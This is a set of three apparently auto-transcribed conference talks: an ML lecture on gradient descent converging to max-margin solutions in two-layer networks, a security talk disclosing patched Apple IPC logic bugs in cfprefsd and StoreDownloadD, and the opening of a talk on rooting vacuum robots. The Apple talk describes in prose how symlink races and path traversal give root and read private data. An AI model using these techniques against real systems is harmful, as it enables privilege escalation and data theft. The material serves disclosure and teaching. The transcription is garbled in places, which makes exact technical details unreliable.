Sekar, and Srebro from 2018, and probably other authors, but I forgot, and what they do is very, very nice, they consider, so the so-called interpolation regime, where you can fit the data perfectly, but in the classification setup, okay, and they consider minimizing, okay, for linear function, this could be, okay, logistic regression, okay, so this is logistic regression, and if you do it with separable data, okay, so this is like your data like that in the plane, and then it's well known that if you're separable, this minimum is not attained, okay, why, because if you take any directions like that, okay, and you set the node of W to infinity, then this will, all the losses will convert to zero, okay, so at the end, the minimum is not attained, okay, so if you load, you got the descent, it will diverge, okay, so this is well known, but what they showed is that it does diverge in a good direction, okay, so you consider W bar being W over W2, okay, so you see the direction, okay, and what they showed is that it converges to the max margin, max margin classifier, okay, so for those who studied research like before in 2005, and I think it's maybe only like Alex and me, oh, okay, okay, good, is, so you take, if you minimize W2, such that YI, this is bigger than one, okay, so you try to find, there are many planes, okay, which are separable data, okay, but among those, you want to find the one for which, okay, this is a plot from the 2000, okay, you want to maximize this distance, okay, and this is called the margin, the inverse margin, okay, and you maximize this, so you're going to select not this one because it's going to be like, that direction would be, would be too close, those two points would be too close, but one which is like maximizing the margin, and this was like really what NIPPS was about like 20 years ago, okay, and so what they showed is that, okay, so when you diverge, you're going to have a good direction, okay, so what is nice is because it does relate some gradient descent towards an explicit minimum norm solution, okay, so often people say, when I do gradient descent, it's like implicitly doing like minimum regularization, it's always like hand waving, and this is formal, okay, so you see there's a proof for that statement, if I launch gradient descent or gradient flow, on that problem, it will diverge, but the direction will converge to this one, okay, all right, so now let's try to apply this to our setup, okay, so now we're going to consider, let me erase this, I'm going to consider, oops, sorry, that's okay, it's not the first time I say that word, so, and not the last time I ever know, okay, so again to consider, so minimizing, so R of F, okay, would be 1 over N sum from J equals 1 to N of log of 1 exponential minus YJ F of XJ, okay, and for which F, of course, for F I erase the important aspect, for F, for F of X being, study a collection, okay, sum over I of A i B i transpose X plus, okay, so now this is the goal, the goal for now is to look at the effect of doing gradient descent on the empirical logistic risk, okay, and with a space of function which is my now two-layer neural networks, okay, so, and now we're going to have similar things in here that it will diverge, but the F, the function will converge to something special, okay, and now the goal is to understand the various regimes, so it will be three regimes, okay, I will probably only have time to talk about two, okay, so let's take, so the first regime will be the kernel regime and the, we call variation norm regime, and this will depend on what I optimize over, okay, so in the kernel regime, I will only optimize with respect to A, okay, so why is it so nice to have only A, because first I've removed the difficulty of B, okay, so it's not going to be with respect to B, so I just assume B is fixed, so I sample B randomly from the sphere as garter, and optimize over A, so this is convex, okay, so first good news, second good news, so now when M is fixed, when M is fixed, this is just a linear function, so I can apply the result of the Chicago researchers saying that I'm going to converge to the F which has that form with the minimum A to norm for A, okay, and now I'm back to also familiar land from the year 2007, this is so-called random features, okay, so this is the so-called random features, why, because I'm sampling the BI uniformly, okay, and here I assume they are fixed, okay, they don't move anymore, they are sampled randomly, and then I do minimum A to norm optimization on A, so it's like I'm penalizing by the A to norm, and if you know your class from Jean-Philippe and Julia Méral, then you know that, then you can represent your F as a weighted sub of kernel functions, and the kernel function will be here, k of xs prime, one over M, so the dot product for the features, so here in this setup, my features are all the BI transpose x plus, okay, I have M of them, so I take the dot product, BI transpose x plus BI transpose x prime plus, all right, and what kernel features are saying, and this is word by Raimian Rect 2007 and Rad-Fornil in 95, they say this converges when M goes to infinity to the expectation of a B of B transpose x plus and B transpose x prime plus, okay, so this is standard like a kernel method from the 2007, all right, and so what is he saying is that if you're only optima about the last layer, you're doing a kernel method, okay, so this is but a good part, so many good parts, let's not forget the good parts, so the good part is that you can quantify how big M needs to be, okay, you can quantify the rate at which this will converge to the good direction, so we think it's more quantitative, the bad part is that the features are fixed, okay, this is not what people are doing in practice, in particular when M goes to infinity, this space of functions is a space of very smooth functions, okay, so I will show examples in the video, in particular if you have a single neuron, a single neuron does not belong to that space, okay, so essentially it's not adapted to a finite number of neurons, okay, so this is the first aspect is that, the first aspect is that kernel regime, you can apply the other regime if you're only optima about the last layer, any questions on this one? Yeah, yeah. How is it related to the theorem you've shown? So here, the relation of the first one? Yeah, so this result is it related to the theorem? No, okay, so the theorem that I'm saying is that, say that if you do, no, it's almost unrelated, because you can apply it, but it's a hammer to squash a fly. So the consequence of the theorem? It's almost a consequence in the sense that, so you apply that result, so you're going to convert it to minimum, and to some solutions for the AIs, okay, and we know that when M is big, doing many AIs like that, we convert the kernel solution, it's not like a formal, it's like a, but more or less totally the consequence of it. All right, so now let's do the, let's do optima thing about the two. This is the core novelty of the work. And then I show the video. All right, show the video. All right, so let's start with a very erratic argument, okay? So if you take ai bi transpose x plus, okay, so you can write this as, you can put the norm of bi outside of the plus by originating, so this is ai bi1 times bi over its norm, transpose x plus, okay, you agree with this? All right, and now if you optima the AI bi, so if you flow the recipe that AGD tends to do the minimum L2 norm solution, you get the L2 norm solution of the L2 norm of the AI bi's, okay? And the L2 norm of the AI bi's, this is ai squared plus bi bi squared, okay? You agree with this? Ai is a number, okay? And this is bigger than ai bi2 squared. No, there's no square. Times two, okay? So in a very erratic way, okay, if you do AGD on the two, you're going to minimize the L2 norm of AI bi, which if you're willing to follow me, you're going to minimize the sum of those, okay? So the L1 norm of those weights, okay? No, because, okay, so the squared L2 norm, if this, okay, and essentially this is bigger than this, you agree with this? Oh, yeah, yeah, yeah, yeah, yeah, sorry. I was like one step ahead, okay? So at the end, if you penalize the sum of the squared L2 norm of the AI bi's, which is suggested by the result by Sudri Gounesset-Karats-Rebro, then it's in a highly-waiving way equivalent to minimizing the sum of those and you get an L1 norm, okay? So it's essentially what we prove. So let me set the theorem. So this is with Venaik in 2020. So let me make it... So what we show is that F converges to... Okay, so we flagged before. So when the number of neurons go to infinity, then I'm going to converge to a gradon flow. And the gradon flow, if it converges to somewhere, it will converge to some solution, which will be the minimum. So L1 norm solution. And this is defined as the int of the integral. So it's going to be... I want to be just formal for once. Like that. So let me write it and then... Okay, so here this sigma is a uniform measure on the sphere. Okay, do you consider writing functions, okay, which are a combination of like those like Rolux functions, plus some weights, A, and you take a measure on those weights. Okay, so it's a special function. And you're going to penalize the output weights, A, by the L1 norm, which is a... Okay, so this is a formal... The formal results and this way cover things that we had, that I had done like three years ago. And this is called a violation norm, okay, and there's very nice paper by... I forgot the name. Corkova and Sanginetti, okay. And so what is nice is that because you have this L1 norm, you have this adaptivity effect that we often see with L1 norm, you can have Dirac's, those are allowed. So the first good thing, you can show that this is like... This can scale well to high dimensions. So as soon as you have some linear structure for your problem, this is going to find it because of the L1 norm. And finally, what is interesting here is that this is a context problem still. Okay, so it's a context problem for which we don't know any like classical algorithms to solve it, but if you use the Kennedy's set on particles, this is working. Okay. And so for the expert in the room, if you look carefully, this is giving you the end of the double descent curve. Okay, so you can meditate this and you can talk at the break. And now I want to show you the rules. All right, so this is like a problem today. So this is essentially this problem, a function which is like that when n equals 5. Okay, so I generate data from that function. Okay, and the goal is to recover the AI in the eyes because I'm homogeneous. I'm going to put AI inside. Okay, and the goal is to learn the five directions, which are the generating neurons. And I'm going to look when M is pretty large. I'm going to sample many neurons. Okay, so what we showed is an egg that when M is infinite, then you should converge to the global optimum and you see what it does for 100 neurons. It does something nice. Up. As you can see, the dynamics is a bit weird. Okay, it does oscillate in many ways and put it again. Okay. All right. So here, what is open for this is we only qualitative. Okay, when M is big, it's fine. But when we take M being five, it does not work. It gets stuck. Okay, you launch with five neurons. You know you can converge to the global optimum, but you never reach it. But as soon as you take M being like 10 or 20, it does work. Okay, and we don't know why. So first open problem. What? If you start really, really close to the true value. Sure, but that's... No, no, just... Of course, if you start at the optimum, it's greater than this end, you converge to the optimum. No, no, so it's... And then, down here. Sorry. Up, and then, so now I'm going to show like the final plot, where here this is strange, the output layer. On the right, the two layers. Okay, so you have plus on the left, plus and minus everywhere. And what I showed you that on the left, this was like L2 norm tab regularization. So it does converge to some kernel method. So it should be like some smooth function. Whereas on the right, it should converge to some L1 norm solution, where because of L1 norm, you're going to set only a small number of neurons, so it should be spiky. Okay, so let's look at... Okay. Ah, c'est joli, indeed. And, yeah, so first, Clarice, not me, we made those nice videos, it's Lenarik. So here you see on the right, the convergence, it's plotting as a classification of regions. So this is very, this is based on the 12 or 13 neurons. Okay, so it's very, very like this was Lenarik. Whereas for the kernel method, you get like a very smooth function. Okay, so just to highlight, to highlight the thing, and we'll put it again. Okay, and... Okay, so I'm almost done. So I've mentioned like several open problems. So the most important one, we have tried, we have tried, and any help is welcome, is to make this quantitative. Okay, so we can do it for the kernel methods. So this is like work from five years ago. But as soon as you go, something like that, you can see that it does behave quite well. You don't need to start with infinitely many neurons, so we don't know how to do it. Okay, we try to simplify the problem a lot, and it's still like not done yet, going convolutional. We don't know how to do. So we want to go beyond, and finally, we'll have to go deep. Okay, trying to go beyond one in a layer, but at the moment it's very hard. Thank you for your attention.
|
Neural networks trained to minimize the logistic (a.k.a. cross-entropy) loss with gradient-based methods are observed to perform well in many supervised classification tasks. Towards understanding this phenomenon, we analyze the training and generalization behavior of infinitely wide two-layer neural networks with homogeneous activations. We show that the limits of the gradient flow on exponentially tailed losses can be fully characterized as a max-margin classifier in a certain non-Hilbertian space of functions.
|
10.5446/54185 (DOI)
|
Hello everyone, another year to see you in its special mode. Welcome to our talk, Cauchu Reveal and Exploit IPC Logic Box inside Apple. First, a self-introduction. Drupal Nguyen is a senior security researcher, he is a member of EcoSec team at Tencent Security Sherm Lab. His research focuses on macOS, iOS and Windows platform security. He has found and reported many vulnerabilities to Apple and Microsoft. He is a speaker of Black Hat Europe 2018 and Defconn28. Reven Sun is a co-author of this presentation. He is a senior security researcher of EcoSec team. He focuses on macOS and iOS platform security. Trinadine is also a co-author of this presentation. He leads the EcoSec team and is a speaker of Black Hat Europe 2018, DefconnChina 2018 and Defconn28. This is the agenda of our talk. First introduction to IPC and Logic vulnerability. Then we talk about the IPC mechanisms on Apple platforms. After that we will share some interesting logic vulnerabilities we found in preferences and app store. Finally we will give a conclusion on IPC logic vulnerabilities on Apple platform. Let's talk about some background knowledge. What is IPC? IPC means inter-process communication. It's a set of techniques provided by the operating system. It allows stand-alone processes to communicate with each other. The communication could be about the process notifying another process about some event or transferring of data from one process to another. The processes involved in IPC could have two roles, client and server. The client requests the server and server may respond to the client if needed. The WES kernel provides the IPC channel to allow the client and server processes to send or reply to messages. There are three advantages that IPC provides. First, modularity. Modern software is more and more complex. With the help of IPC, developers could divide the complex system into separated modules. It reduced the complexity of software and avoids reinventing the wheel. Second, stability. If all data encode are inside one process, a little error would probably crash the entire system. By dividing a complex system into separated modules, a module crash would not crash the entire system, which makes the system more stable. Third, privilege separation. With IPC, developers not just separate functionality, but also separate the privilege. Isolating sensitive operations into separated processes, giving the processes the least privilege. Even if part of the system is hacked, it will not compromise the entire system and increase the security and protection from the attacks. Let's see an example of IPC usage. For that browser, it's nearly impossible to build a rendering engine that never crashes on hands. It's also nearly impossible to build a rendering engine that's perfectly secure. To solve this issue, modern browsers mostly use multi-process architecture. For example, it may divide the components into rendering process and networking process. The different processes of browsers would communicate with each other through IPC, and all of them also need to request the offering system system service. You may not feel it, but IPC is everywhere. The using of IPC divides the entire system into separated processes. Different processes have different privileges. Process may have low privilege or high privilege. Process may be sandboxed or non-sandboxed. There is a security boundary between them and IPC may break it. IPC is a bridge between different processes, so it is also a window between different privileges. IPC vulnerability is a key to high privilege, so it is one of the most valuable targets for privilege escalation. Logic vulnerability is different from memory corruption vulnerability. We do not want to play with memory corruption since they are boring to us. We like to find logic flaws. There are two kinds of logic flaws that is introduced during design phase and one is introduced during implementation phase. In fact, most of the time, abusing existing features are enough for us to compromise the entire system. Apple's new MacBook and iPad Pro have equi-pied with the new Apple M1 chip, the new chip but brings many additional security features such as system integrity, data protection, and pointer authentication code. The pointer authentication code or PAC is a hardware-level security mechanism against memory bug which makes memory games much harder. Logic vulnerability is not playing with memory corruption and may not be affected. So it's the spring of logic vulnerability finally coming. Before introducing the IPC logic vulnerabilities, let's start with some fundamental knowledge of IPC on Apple platforms. Apple AIPC has different specific implementation methods. This includes shared files, shared memory, and sockets, which other systems support as well. There are also some that are unique to Apple, such as marker messages, Apple events, distributed notifications, and so on. However, the latest and most advanced IPC methods on Apple platforms currently are XPC and NSXPC. Apple implements them on top of Mark message. Next, we will walk you through the principle and usages of them. Mark port is an endpoint of unidirectional communication channel, which is one of the fundamental primitives of XNU kernel for messaging. Messages can be sent or received from it. Users of mark port never actually sees the port itself, but accesses through a type of indirection called port writes. The sender of the message can send the message to mark port through the send write. The receiver of the message can get the received message from the mark port through the receive write. The message transmitted through the mark port is called mark message. The system trap level API mark message and mark message overwrite can be used to send or receive mark messages. The structure contains a header, an optional complex data, and message buffer. The header contains the sender and receiver of the message. The optional complex data part can transfer complex data such as file handle, shared memory, and mark port. Message buffer is used to send binary data. Mark message is low level and powerful, but it is also ancient and poorly documented. Developers needs to construct entire structure to transmit data and handle different data type by themselves. It is difficult to use and Apple also does not recommend developers to use it directly. Instead, Apple provides high level IPC mechanisms that are easier to use. On top of mark messages, Apple built another communication mechanism called XPC. XPC is managed by launch D process. Launch D is a naming server. The XPC server registers with launch D and declares that it will handle message sent to its endpoint. The client looks up an endpoint name via launch D and sends a message request. The server will receive the request, handle it, and reply to the client if needed. Behind the scene, launch D starts and terminates the target server process on demand. The message sent through XPC is called XPC message, which is a more structural dictionary format. XPC users do not need to pay attention to the details of the underlying mark message processing. Through the XPC dictionary set APIs, we can easily construct an XPC dictionary message. Besides supporting the transmission of basic types of data such as typical string, integer, and boolean, XPC message also supports complex data types such as file descriptor and shared memory. XPC message is serialized into mark message and transmitted to the other end of the IPC via the XNU kernel. The received mark messages is all serialized to XPC message and then can be used through the XPC dictionary get APIs. At API level, the XPC server calls XPC connection create mark service API with the XPC connection mark service listener flag set to register itself to launch D as an XPC service. And then the client can connect to the XPC service through the same API. The message sending is completed by the XPC connection set message. After the process received the XPC message, the registered message handler via XPC connection set event handler will be called to process the message. The mainstream languages for app developers are the object oriented object C and Swift. So Apple has encapsulated a layer of object oriented implementation on top of XPC called NSXPC. NSXPC provides a set of remote procedural interface implementations instead of caring about the underlying message like XPC. After establishing the connection, the client can directly call the open interface of the NSXPC server across processes just like calling local methods. Apple provides many NSXPC classes for developers. The server registers the service with launch D through the NSXPC listener and specifies a NSXPC listener delegate to handle the connection request. The connection between the client and server is managed by NSXPC connection. What method can a client call in a server? The NSXPC server defines this through the Objective C protocol which defines programmatic interface between the calling application and service. In interfaces definitions, common arithmetic types and basic types such as strings and arrays are directly supported as parameters. The interface also supports custom defined class objects to be passed as parameters. The custom object needs to implement the NS secure coding protocol. Here is an example. Here is an architectural diagram from Apple. The server registers the service through NSXPC listener. The app establishes a connection with the service through the NSXPC connection. In this process, both parties can directly call remote methods across process boundary without caring about the underlying implementation details. We will now share some interesting logical vulnerabilities we found and exploited on Apple platforms. We found and reported 3 logic bugs in preferences components. With these vulnerabilities, a local user may be able to modify protected parts of the file system. What are preferences? Preferences are user defined settings. They are persistent data stored in preferences file. Its format is property list also called plist. The service cf.prefsd has the responsibility to manage preferences. It would read from or write to preferences file according to client requests. Apple provides two kinds of high level preferences API. Using the foundation API, apps could use the NS user defaults class to access its preferences. Each app has a single instance of this class. Go from the standard user defaults class method. Through the shared user defaults object, apps could get and set individual preferences values. Apps can also use many of the underlying core foundation APIs. For example, cf.pref.setapp value and cf.pref.copyapp value could be used to get or set the preferences data. After reverse engineering cf.prefsd, we found it creates the xpc service named com.apple.cfprefsd.demon, which runs with root privilege and without sandbox. When a client requests cf.prefsd, event handler will be scheduled to handle the request. As a foundational service, preferences could be accessed from almost everywhere. Even the most restricted process needs to access preferences. Here is a sandbox profile for Safari web process. It allows the sandbox process to access com.apple.cfprefsd.demon. Because cf.prefsd is an xpc service, we could also request it by sending xpc message directly. It is a low-level method that could control the operation more precisely. Here is a sample request. First we use xpc.connection.createMarkService to create a service connection. Then we create the xpc dictionary and set the key value that is used to control the operation. Finally, we send the xpc message through the xpc.connection.setMessage.api. Where does cf.prefsd save the preferences data? The preferences file path is constructed from multiple components. Part of it is the fixed value in cf.prefsd. Parts of it come from declined through xpc.message. First, let's see the preferences directory where the preferences file is stored in. There are some predefined locations to store the file. Preferences domain is the value that is passed through the cf.prefsd domain key. By default, the file path is composed of preferences directory, preferences domain and the service string.plist. How is the file path constructed? There are two main components. First, format the file path with cf.string.createWizFormat, which concoct the preferences domain with.plist. Then using cf.url.createWizFileSystemPath relative to base to generate the full path. The base URL is the preferences directory and the file path is the path returned above. Logic vulnerabilities always combine some features and we found that cf.url.createWizFileSystemPath relative to base have two features that may be abused. First, this function has pass traversal feature. If filepaths contains..slash, the returned file path could traverse to any path we want. The second feature is that if the file path is an absolute path, it will return the file path no matter what the base URL is. We could use the pass traversal feature or absolute path feature to control the preferences file path and return any file path we want. What if the controllable file path does not exist on the file system? The function named cacheActualPathCreatingIfNecessary is very interesting. Seems you will create the file path if it does not exist. First you will try to open a file if the file path exists, you will return the path. If the file path does not exist, you will get the directory part of the file path and it will create the directory. After creating the directory, it tries to open the file path again and then return the file path. The cf.pref.createPreferences directory is the function used to create the non-existed directories. It first split the path into multiple sub-items by slash and then creates them recursively with make directory add. After the directory is created, its ownership will be modified through a file change owner. But where does the user ID and group ID came from? The owner of the newly created directories is determined by several factors. By default, the owner is the identity of the XPC client and cf.pref.d get the identity of the client user through XPCConnectionGetEffectiveUserID and XPCConnectionGetEffectiveGripID. However, the XPC client can also specify the expected user. Therefore, the ownership of the newly created directory is also under our control. We can let cf.pref.d help us create any directory with controlled owner. There are many ways to convert arbitrary directory creation to code execution with root privilege. Here we share a method mentioned by ZubatFizzle through periodic script. The periodic script is a mechanism to schedule script execution. The daily directory does not exist by default, but the operating system will periodically scan and execute the files in it. By exploiting the vulnerability, we can create the daily directory and set the owner of the directory to the current user. And then we can write any script to the daily directory. Wait a day and the script will execute with root privilege. The patch for the vulnerability is simple and straightforward. It can be explained even by looking at the function name. The cache actual path creating if necessary function has been replaced with cache file info for writing. There is no creating anymore. In fact, cf.pref.d will no longer help the user create the non-existing prefaces directory. If client passing a directory which does not exist, cf.pref.d will ask the client to create it. How does cf.pref.d read the prefaces data? Even client wants to get the data, the client needs to request cf.pref.d. By default, you will read the data and return them in the reply directly. But if the size of the file is too large to fit in a xpc message, you will just return the file descriptor. To avoid subsequent changes to the file, you will clone a copy before returning the file descriptor. This function is the implementation of cf.pref.d to process large prefaces file. First, it gets the file path, then it determines whether the file size exceeds 1MB. Then it generates a random temporary file path according to the rules and then clone the original file to a temporary file. Finally open the temporary file and return its file descriptor. It calls clone file to clone the file to a temporary file with a random name. The temporary file and the original file are in the same directory. The path of the temporary file is generated by make temp according to a rule. The rule is that the file path is spliced with.cfp and 7 random characters. So the final temporary file name is random. But can it guaranteed to be random? The make temp will replace the 7x at the end of the rule with random characters. The space for random characters is very large. Is there any other way to make make temp generate a fixed file name? One key point is that ascent printf specifies the maximum length of 0x400 when generating rules. If plist path is very long, what happens if the splicing rule exceeds 0x400? Ascent printf will overflow and the characters exceeding 0x400 will not be written into the written buffer. To be more precise, if the length of the file path path.cfp string is exactly 0x400-1, the rule generated by accent printf will not contain x at the end. And make temp will generate a fixed temporary file path. The full clone file is called, there is a file check. In exploit code, we can first pass in a normal file path. This will ensure that cfprefst can successfully pass this check and enter the subsequent clone file process. After the file check, and before the clone file, there is a window for its condition. If we replace the controllable file with the symbolic link during this time, cfprefst will call clone file to help us copy arbitrary file to the temporary file path we control. We got a fixed temporary file name, but can we link it to another place ahead of make temp function? No. This file name is guaranteed not to exist at the time of function invocation. But after the make temp returns successfully and before the clone file, this is also a window for its condition. We could replace the temporary file with a symbolic link. In this way, we can achieve arbitrary file write. In the patch, Apple added an overflow checking and the subsequent clone file will not be executed if overflow occurs. The previous method of forcing fixed file name no longer works. How does cfprefst write preferences data? When cfprefst saves preferences data for the client, first extract key and value from xpc message, then it reads the original data from the target file, and generates new data based on the incoming key and value data, and writes to the new data to the temporary file, and then it renamed the temporary file back to the target file. When saving data, cfprefst verifies the client has write permission to target file. The client needs to pass in a file descriptor with write permission. After the previous check, cfprefst would generate a temporary file and write data to it. Then we'll rename this temporary file back to the target file. Can a normal user replace the source file of the rename with a symbolic link? No, this temporary file is a root-owned directory, and normal user does not have permission to write to this directory. Can a normal user replace the renamed target with a symbolic link? Normal user has write permission for the target, but the target file will be deleted first when the rename is called, so even if it can be replaced with a symbolic link, it will not work. Regarding this feature, the rename API documentation says, if the final component of the target is a symbolic link, the symbolic link is renamed, not the file or directory to a treat points. But wait, the document says that if the final component of the target is a symbolic link, rename will delete it first. What if it's not the final component? What if the middle component of plist path is a symbolic link? Suppose the path of preferences is slash-temp-test-hello.plist. If we replace the directory with a symbolic link pointing to the launch-demons directory, then the hello.plist is used as the target path of rename. What will happen? The symbolic link will be followed, and the temporary file will be moved to the launch-demons directory. Before renaming the temporary file, it verifies the caller has write permission. However, after the file check and before the rename function, there is a time window to replace the middle component of file path with symbolic link. When renaming files, it will move the temporary file with controllable content to arbitrary path. The patch for the rename vulnerability is very simple. Rename is replaced with rename-add. Rename-add locates the target file according to the directory descriptor to ensure that the final move target must be in a certain directory. So even if we replace the directory with a symbolic link, it will not work anymore. Here is a demo. We used the vulnerabilities to achieve arbitrary file read and write, and then we could gain read privileges on macOS and read privacy data on iOS. First, we used preferences vulnerabilities to achieve read privilege. We could see the system integrity protection is enabled. The current user is a normal user, not read. We could get the read privileges very quickly. Next, we used preferences vulnerabilities to read privacy data on iOS. You could see our demo application is not allowed to access photos and contacts. However, if we take a photo, then open the demo application, or demo application can steal the photo and send it to our server. Thank you. Last year, we found and reported an interesting logic vulnerabilities in macOS App Store component. An application could abuse it to gain elevated privilege. The vulnerability exists in NSXPC server com.apple.storedownloadd.demon. The server is implemented in StoreDownloadD application which runs with root privilege. Fortunately, this process is running in sandbox. But unfortunately, as an app download service, it must have the ability to write to some sensitive locations. For example, it is allowed to write to applications and keychains directory. As an NSXPC server, it provides many interfaces for client. Here we listed the Set Store client and Perform Download interface. The Perform Download interface is very interesting. This interface performs downloading jobs for client. But what can it download and what is the SS Download parameter? For NSXPC, the ObjectiveCU object that implements NSsecureCoding protocol could be used as parameters. SS Download is such an object. This object only has one property, assets, and it is an array. The element in the assets array is SSDownloadAsset object. It is also an ObjectiveCU object and it has three properties, the URL, download path, and hashes. The SSDownloadAsset object is passed from client to server. The properties of SSDownloadAsset will be serialized in client, the function encode with coder will be called to serialize the specified properties to XPCMessage. At the server side, the XPCMessage would be on-serialized with any twist coder and construct the SSDownloadAsset object with specified properties. The properties of the object would be fully controllable. How does StoreDownloadD perform downloading tasks? You will perform download tasks according to the URL. Then it verifies the response contents based on the hashes. Finally you write the contents to the specified download path. There is a hash verification in the download logic. This function will calculate the hash of the response contents and then compare it with the hashes defined specified. And it's not a security check, just a data integrity verification. Because we can control the download URL, the content hash, and download path, we could write arbitrary file path with the StoreDownloadD's privilege. Attackers could say, hi, StoreDownloadD, please help me download the file from this URL. This hash is this, and then write the contents to this download path. Thanks. Then the StoreDownloadD would do all the jobs well for the attacker. How did Apple fix this vulnerability? The issue was suggested by removing the vulnerable code, they said. To be more precise, they completely removed the service. There is no com.apple.storedownloadd.demon anymore. Here is the demo of App Store Vulnerability. We just downloaded the test.keychain intent directory to keychains directory with the help of StoreDownloadD. There are other interesting logic vulnerabilities we found in our blog. An XPC service implementation flaw, which is a logic bug inside LaunchD for managing the XPC service. An NSXPC vulnerability in Adobe Acrobat Reader for macOS. There are many security mechanisms on Apple platform that tries to make vulnerabilities harder to exploit, like DEP, ASLR, PAC and so on. But you probably noticed that logic bugs are not affected by these security features. That's just awesome. Logic vulnerabilities has many advantages. Though it is hard to find, it is easy to exploit. The exploitation is always stable. The logic vulnerabilities exist across platforms often, so one exploit could roll them all. Logic bugs in core frameworks like preferences let us rule all Apple platforms, Intel and Apple Silicon alike, without changing one line of our exploit. Apple is also working hard to try to reduce the IPC attack services. For example, by adding more restrictive sandbox rules, it reduced the IPC services accessible to applications. They keep deleting the unnecessary high-privileged services, and they are adding more and more private entitlements to make many high-privileged services only accessible to Apple applications. It is hard to make sure everything is perfectly secure, though Apple is also trying to limit the damage. For example, they are putting IPC services in sandboxes and give them the least privilege. They are also using rootless to limit the root privilege. In this presentation, we talked about the latest IPC mechanism on Apple platforms, XPC and NSXPC. We walked you through some of the interesting IPC logic vulnerabilities, three logic vulnerabilities in preferences and one in App Store. We detailed the design logic and implementation of these components, the flaws inside them, and how we exploit them to elevate privilege. And we also talked about the advantage of IPC logic vulnerability and the state of Apple IPC security. Stickbox are always fun to hunt for, we think you will love it just as we do. We would like to thank Shaba, Fizzle, Ian Beane and G-Gel for their previous work and shares.
|
Apple's iOS, macOS and other OS have existed for a long time. There are numerous interesting logic bugs hidden for many years. We demonstrated the world's first public 0day exploit running natively on Apple M1 on a MacBook Air (M1, 2020). Without any modification, we exploited an iPhone 12 Pro with the same bug. In this talk, we will show you the advantage and beauty of the IPC logic bugs, how we rule all Apple platforms, Intel and Apple Silicon alike, even with all the latest hardware mitigations enabled, without changing one line of code. We would talk about the security features introduced by Apple M1, like Pointer Authentication Code (PAC), System Integrity, and Data Protection. How did they make exploiting much harder to provide better security and protect user's privacy. We will talk about different IPC mechanisms like Mach Message, XPC, and NSXPC. They are widely used on Apple platforms which could be abused to break the well designed security boundaries. We will walk you through some incredibly fun logic bugs we have discovered, share the stories behind them and methods of finding them, and also talk about how to exploit these logic bugs to achieve privilege escalation. REFERENCES: https://www.youtube.com/watch?v=Kh6sEcdGruU https://support.apple.com/en-us/HT211931 https://support.apple.com/en-us/HT211850 https://support.apple.com/en-us/HT212011 https://support.apple.com/en-us/HT212317 https://helpx.adobe.com/security/products/acrobat/apsb20-24.html https://helpx.adobe.com/security/products/acrobat/apsb20-48.html https://helpx.adobe.com/security/products/acrobat/apsb20-67.html
|
10.5446/54186 (DOI)
|
Hi, I am Dennis Giezer and welcome to my talk about robots with lasers and cameras, but no security, where we will talk about ways how you can liberate your vacuum from the cloud. Before we start, here is some background information about me. I am a PhD student at Nafisa University and I am working with Professor Gewerner Beer. Our research field is wireless and embedded security. My particular interest is in the reverse engineering of interesting devices. I focus on smart home devices, mostly vacuum cleaning robots. My current research is in the security and privacy of smart home speakers. In our most recent work, we analyzed the security and privacy of used Amazon Echo devices. This paper was published on ACNYSEC this year. Let's talk about the goals of this talk. First, I would like to give you an overview over the current development and routing of vacuum cleaning robots. In particular, we will focus on Roborock and Dreamy. We will talk about vulnerabilities and backdoors. And I will explain new methods which you can use to route your device. As a general side note, I have no intention of bashing the companies. I like the products and I think we have maintained a very friendly relationship. However, obviously our goals are slightly different. All right, let's talk about our motivation. So, why do we want to route devices? Well, these devices have powerful hardware and a lot of sensors we can play around with interesting hardware. This is especially interesting for people in education. Then we want to step devices from constantly phoning home. Also, a lot of people have already custom smart home services running, for example, home assistant. And here it is interesting to connect the vacuum cleaners to that system. And finally, we want to verify the privacy claims of the manufacturers. So, why don't we trust IoT? Well, IoT in general, they are always connected to the internet and they are on your home network. The cloud communication is encrypted and you don't really know what kind of data is transmitted. From our experience, we know that developing secure hardware and software is hard and that IoT devices are not always being patched. Also, vendors sometimes contradict each other in regards of their privacy claims. And as an end user, you have no way to be sure. All right, here's an example. Roborock claims for the flagship model that nothing is sent to the cloud, especially what is recorded by the camera. This claim was also certified by the German TÜV. However, on the same website, they show that you can access the camera remotely from your phone. For example, you can watch your pets and talk to them. Let's talk about the problem of use devices. A lot of people order devices on Amazon, try them and return them. So, use devices are not that rare. As a buyer, you have no real information about the path of the device. So, a malicious person could have installed a root code onto it. As a new owner, you have no way to verify the software and as a result, you might have a malicious device in your home network. So, routing is the only way for you to verify that the device is in fact, heen. All right, let's take a look into the past, the good old times of routing. My first work with vacuum cleaning robots was back in 2017. Here, I worked with Danny Weigema and we were looking at the Xiaomi vacuum cleaning robot and the Roborock S5. We figured out that the firmware images of these devices were unsigned and encrypted with a very weak key and that custom firmware could be pushed from the local network. As a result, it was possible to route the devices to this assembly and develop custom software and void packages for the bin. We published our findings on the 34C3 and back in 2017 and also on Defcon exactly three years ago. Here, I would like to give you some short recap about the hardware of the Xiaomi vacuum robot and the S5. Both robots were running on ARM quad core CPU and have 512 megabit of RAM. They had also 4 gigabyte of EMMC flash. They had a lot of sensors and in particular, the most important ones are the LiDAR sensor on the top of the robot, the infrared sensor and the retrosonic sensor. These devices had also some debug ports, for example USB and UART. However, USB was kind of protected and we never reuse this for anything. To give you some background information about the software, these devices run Ubuntu 14.04, mostly untouched, however, the vendor is obviously scheduled to route the password. Interestingly, the vacuum cleaners were controlled by the player software, which is basically an open source robot device interface and server. So they used open source software to run the devices. There's a lot of proprietary software on them. For example, they used the custom ADB version, which had some authentication and so we couldn't really use it. They run a custom watchdog, which made sure that the device didn't crash, but on the other side also enforced copy protection and they had the logging tool, which uploaded a lot of data to the cloud. They protected the ports on the device with IP tables. For example, they blocked the port 22 for SSH and blocked also the player ports. However, the interesting thing was that the IP tables rules only apply to IP version 4. So if the device got an IP version 6 address, it would not buy a volt at all. All right, let's look on how the forces dragged back and how they started to lock down devices. Well, the first steps in locking down we saw with newer S5 firmware. So here, Roborock did block local firmware updates. And personally, this change was also pushed through other IoT devices from Xiaomi. So most devices were basically blocking local firmware updates. We saw more changes with the introduction of the Roborock S6, which came out in 2019. For example, the firmware and the voice packages were now signed, so we were not able to create our own custom voice packages anymore. Each model also used different encryption keys. So if we had encryption keys for one model, we were not able to decrypt firmware for a different model. They also started to sign the configuration files to enforce region locks as many people bought cheap devices from China and modified them so that we were able to use them outside of Mainland China. One interesting aspect is that most of the hardware remained mostly the same, so most of the changes were basically just done in software. All these changes meant that in order to get root access onto the device, we need to disassemble it. One thing which we thought back then when this device came out that we might need to keep rooting method secret. And so in the first two weeks when I got to Roborock S6, I was able to root it and then develop two different methods. One where we extracted root password via UART and 